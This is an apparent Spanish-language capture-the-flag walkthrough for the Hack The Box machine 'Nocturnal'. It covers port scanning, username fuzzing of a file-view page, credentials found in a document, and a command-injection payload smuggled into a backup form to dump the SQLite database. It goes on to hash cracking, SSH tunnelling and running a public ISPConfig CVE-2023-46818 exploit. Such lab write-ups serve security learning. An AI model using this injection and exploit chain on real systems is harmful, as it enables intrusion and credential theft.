Nocturnal

Nocturnal


HTB Linux

nmap -A -p- -oA nocturnal 10.129.153.236 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA nocturnal 10.129.153.236

echo "10.129.153.236 nocturnal.htb admin.nocturnal.htb" | sudo tee -a /etc/hosts

ssh_command.

nmap -sU -O -p- -oA nocturnal-udp 10.129.153.236

ping -c 1 10.129.153.236

nmap -p- --open -T5 -v -n 10.129.153.236

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.153.236 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p22,80 10.129.153.236 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

whatweb http://10.129.153.236

ssh_command.

Nos dirigimos a http://nocturnal.htb

ssh_command.

Ahora nos registramos

ssh_command.

Ahora vemos que podemos subir archivos

ssh_command.

ssh_command.

Se crea un archivo en el servidor

ssh_command.

ffuf -u 'http://nocturnal.htb/view.php?username=FUZZ&file=cu3rv0x.pdf' -w /usr/share/Seclists/Usernames/xato-net-10-million-usernames.txt -H 'Cookie: PHPSESSID=qme7rh97bcn67gitk7ne46jalt' -fs 2985

ssh_command.

Buscando en los archivos de amanda vemos privacy.odt

ssh_command.

libreoffice privacy.odt

ssh_command.

Credenciales-> amanda:arHkG7HAI68X8s1J

Le damos click a Go to Admin Panel

ssh_command.

Metemos la contrasena de nuevo para crear el backup

ssh_command.

Se genera un backup de los archivos.

ssh_command.

Hacemos un post en el formulario

c%09"sqlite3%09/var/www/nocturnal_database/nocturnal_database.db%09.dump"%0A
&backup=

ssh_command.

Agarramos el hash de tobias.

ssh_command.

hashcat -m 0 hash /usr/share/wordlists/rockyou.txt

ssh_command.

Credenciales tobias:slowmotionapocalypse

ssh tobias@nocturnal.htb

ssh_command.

cat user.txt

ssh_command.

Vemos que el puerto 8080 esta escuchando.

netstat -ano

ssh_command.

ssh tobias@nocturnal.htb -L 4444:127.0.0.1:8080

ssh_command.

ssh_command.

Trate de buscar la version de ispconfig

ssh_command.

Busque en searchsploit pero no tenian de la version 3.2

ssh_command.

https://github.com/blindma1den/CVE-2023-46818-Exploit

python test2.py http://127.0.0.1:4444 admin slowmotionapocalypse

ssh_command.

© 2025 Cu3rv0x